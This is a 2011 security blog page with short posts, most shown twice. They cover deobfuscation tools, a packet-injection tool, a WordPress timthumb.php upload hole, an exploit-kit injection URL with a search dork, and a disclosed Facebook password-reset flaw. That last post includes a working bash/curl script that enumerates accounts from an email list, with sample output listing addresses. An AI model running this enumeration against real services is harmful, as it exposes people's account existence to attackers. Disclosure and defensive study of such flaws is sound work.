... neuere Einträge
Wednesday, 3. August 2011
Script Deobfucation Tools
Am Wednesday, 3. Aug 2011 im Topic 'Tools'
Web pages that contain exploits often use a series of redirects and obfuscated code to make it more difficult for somebody to follow. Useful programs for use in exploring malicious pages:
* Creme Brulee
http://code.google.com/p/cremebrulee/
* Firebug – Firefox plug-in
http://getfirebug.com/
* Google Chrome Developer Tools
http://www.google.com/chrome/
* Javascript Deobfuscator – Firefox plug-in
https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/
* JSDebug
http://www.codeproject.com/KB/scripting/hostilejsdebug.aspx
* Malzilla
http://malzilla.sourceforge.net/
* Microsoft IE8 Developer Tools
http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-8
* Microsoft Script Debugger
http://www.microsoft.com/downloads/en/details.aspx?familyid=2f465be0-94fd-4569-b3c4-dffdf19ccd99&displaylang=en&pf=true
* Rhino
http://www.mozilla.org/rhino/
* SpiderMonkey + V8
https://developer.mozilla.org/en/SpiderMonkey
http://code.google.com/p/v8/
* The Mina
http://dontstuffbeansupyournose.com/2008/11/23/javascript-malware-deobfuscation/
* Creme Brulee
http://code.google.com/p/cremebrulee/
* Firebug – Firefox plug-in
http://getfirebug.com/
* Google Chrome Developer Tools
http://www.google.com/chrome/
* Javascript Deobfuscator – Firefox plug-in
https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/
* JSDebug
http://www.codeproject.com/KB/scripting/hostilejsdebug.aspx
* Malzilla
http://malzilla.sourceforge.net/
* Microsoft IE8 Developer Tools
http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-8
* Microsoft Script Debugger
http://www.microsoft.com/downloads/en/details.aspx?familyid=2f465be0-94fd-4569-b3c4-dffdf19ccd99&displaylang=en&pf=true
* Rhino
http://www.mozilla.org/rhino/
* SpiderMonkey + V8
https://developer.mozilla.org/en/SpiderMonkey
http://code.google.com/p/v8/
* The Mina
http://dontstuffbeansupyournose.com/2008/11/23/javascript-malware-deobfuscation/
nSpaces
Am Wednesday, 3. Aug 2011 im Topic 'Tools'
nSpaces: Multiple virtual Desktops With Password Protection and easy switch
Fetures of nSpaces
Launch Desktops: Create multiple desktops on your computer.
Launch Apps: Open different applications on each separate virtual desktops to improve your productivity.
Name your space: label your tag for each virtual desktop, the tag is shown on the space switcher.
Change wallpaper: Your desktop is unique, Set a custom desktop image for each of your desktops and watch as the pictures fade into each other when switching between your desktops.
Color your space: If you don’t like to set a custom image for each desktop, just set a background color for them.
Protect your space: If you don’t like anonymous users to use your spaces, just set a password for them.
Hotkeys for everything: nSpaces has a group of hotkeys for each desktop you created, hotkey for the space switcher.You can change whatever you want.
Using Nspace is very easy and simple GUI based menu driven. Fast to configure and make changes and save.
Download
http://www.bytesignals.com/binary/nspaces/setup.exe
Fetures of nSpaces
Launch Desktops: Create multiple desktops on your computer.
Launch Apps: Open different applications on each separate virtual desktops to improve your productivity.
Name your space: label your tag for each virtual desktop, the tag is shown on the space switcher.
Change wallpaper: Your desktop is unique, Set a custom desktop image for each of your desktops and watch as the pictures fade into each other when switching between your desktops.
Color your space: If you don’t like to set a custom image for each desktop, just set a background color for them.
Protect your space: If you don’t like anonymous users to use your spaces, just set a password for them.
Hotkeys for everything: nSpaces has a group of hotkeys for each desktop you created, hotkey for the space switcher.You can change whatever you want.
Using Nspace is very easy and simple GUI based menu driven. Fast to configure and make changes and save.
Download
http://www.bytesignals.com/binary/nspaces/setup.exe
Websitedefender
Am Wednesday, 3. Aug 2011 im Topic 'Malware Search'
Fetures of websitedefender
Detect Malware present on your website
Audit your web site for security issues
Avoid getting blacklisted by Google
Keep your web site content & data safe
Get alerted to suspicious hacker activity
Secures against malware and hackers
Keeps your customers data safe
Avoid being blacklisted by Google
Provides WordPress security
Click here to register or know more on WebsiteDefender.
https://dashboard.websitedefender.com/register-for-free-website-scan.php
Detect Malware present on your website
Audit your web site for security issues
Avoid getting blacklisted by Google
Keep your web site content & data safe
Get alerted to suspicious hacker activity
Secures against malware and hackers
Keeps your customers data safe
Avoid being blacklisted by Google
Provides WordPress security
Click here to register or know more on WebsiteDefender.
https://dashboard.websitedefender.com/register-for-free-website-scan.php
Hexinject - Linux
Am Wednesday, 3. Aug 2011 im Topic 'Web Security'
These are the current features of Hexinject:
Hexadecimal and raw data injection on the net
Sniff data in hexadecimal or raw format from the net
Data can be piped and easily manipulated
Raw network access cmdline framework
Automatically set the correct checksum (IP, TCP, UDP, ICMP)
Automatically set the correct packet length (IP, TCP, UDP, ICMP)
Download
http://sourceforge.net/projects/hexinject/files/
Hexadecimal and raw data injection on the net
Sniff data in hexadecimal or raw format from the net
Data can be piped and easily manipulated
Raw network access cmdline framework
Automatically set the correct checksum (IP, TCP, UDP, ICMP)
Automatically set the correct packet length (IP, TCP, UDP, ICMP)
Download
http://sourceforge.net/projects/hexinject/files/
WordPress image utility - PHP Upload
Am Wednesday, 3. Aug 2011 im Topic 'Vulnerabilities'
The Exec summary: An image resizing utility called "timthumb.php" is widely used by many WordPress themes. Google shows over 39 million results for the script name. If your WordPress theme is bundled with an unmodified timthumb.php as many commercial and free themes are, then you should immediately either remove it or edit it and set the $allowedSites array to be empty. The utility only does a partial match on hostnames allowing hackers to upload and execute arbitrary PHP code in your timthumb cache directory. I haven’t audited the rest of the code, so this may or may not fix all vulnerabilities. Also recursively grep your WordPress directory and subdirs for the base64_decode function and look out for long encoded strings to check if you’ve been compromised.
Source
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
Source
http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
Android Trojan records phone calls - Android
Am Wednesday, 3. Aug 2011 im Topic 'Android'
A Trojan spying on your conversations
Source
http://community.ca.com/blogs/securityadvisor/archive/2011/08/01/a-trojan-spying-on-your-conversations.aspx
Source
http://community.ca.com/blogs/securityadvisor/archive/2011/08/01/a-trojan-spying-on-your-conversations.aspx
Practical C++ Decompilation
Am Wednesday, 3. Aug 2011 im Topic 'Tutorials'
C++ decompilation how to handle it in IDA and Hex-Rays decompiler. You can get the slides here
http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf
and download the recorded talk here.
http://www.archive.org/details/Recon_2011_Practical_Cpp_decompilation
http://www.hexblog.com/wp-content/uploads/2011/08/Recon-2011-Skochinsky.pdf
and download the recorded talk here.
http://www.archive.org/details/Recon_2011_Practical_Cpp_decompilation
Best Pack exploit kit
Am Wednesday, 3. Aug 2011 im Topic 'News'
New injection url is 1see[dot]ir/j/. Currently leading to a Best Pack exploit kit
Google Dork
http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=1see.ir/j/
Google Dork
http://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=1see.ir/j/
Facebook password recovery
Am Wednesday, 3. Aug 2011 im Topic 'Vulnerabilities'
Step by step:
- - Go to http://m.facebook.com
- - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)
- - Try using a real email address and try to use a fake email address,
you will see two differents behavior.
Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0 passing a email address through
"ep" variable.
Using cURL:
curl -s -d "ep=test () mail com" http://m.facebook.com/reset.php?refid=0
This process has no validation for external or forgery site/form.
Using the script:
#--------------------
#!/bin/bash
for mail in $(cat $1);
do
s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep
form>/dev/null);
if [ $? -eq 0 ]; then
echo "$mail No tiene cuenta.";
else
echo "$mail Si tiene cuenta.";
fi
done
#+----- EOF ------+
You can ennumerate users by using a list of email address or phone numbers.
$ sh poc.sh mails.txt
putita666 () yahoo com NO
chapalapachala () gmail com YES
esteban.gutierrez () gmail com YES
casatola () gmail com YES
casacasa () gmail com NO
berpnarf () hotmail com NO
asdfgsdfgerT () asdfgh com NO
by
Zerial
- - Go to http://m.facebook.com
- - Go to "Forgot your password" (http://m.facebook.com/reset.php?refid=0)
- - Try using a real email address and try to use a fake email address,
you will see two differents behavior.
Well, now try to do a POST request to
http://m.facebook.com/reset.php?refid=0 passing a email address through
"ep" variable.
Using cURL:
curl -s -d "ep=test () mail com" http://m.facebook.com/reset.php?refid=0
This process has no validation for external or forgery site/form.
Using the script:
#--------------------
#!/bin/bash
for mail in $(cat $1);
do
s=$(curl -s -d "ep=$mail" http://m.facebook.com/reset.php?refid=0|grep
form>/dev/null);
if [ $? -eq 0 ]; then
echo "$mail No tiene cuenta.";
else
echo "$mail Si tiene cuenta.";
fi
done
#+----- EOF ------+
You can ennumerate users by using a list of email address or phone numbers.
$ sh poc.sh mails.txt
putita666 () yahoo com NO
chapalapachala () gmail com YES
esteban.gutierrez () gmail com YES
casatola () gmail com YES
casacasa () gmail com NO
berpnarf () hotmail com NO
asdfgsdfgerT () asdfgh com NO
by
Zerial
... ältere Einträge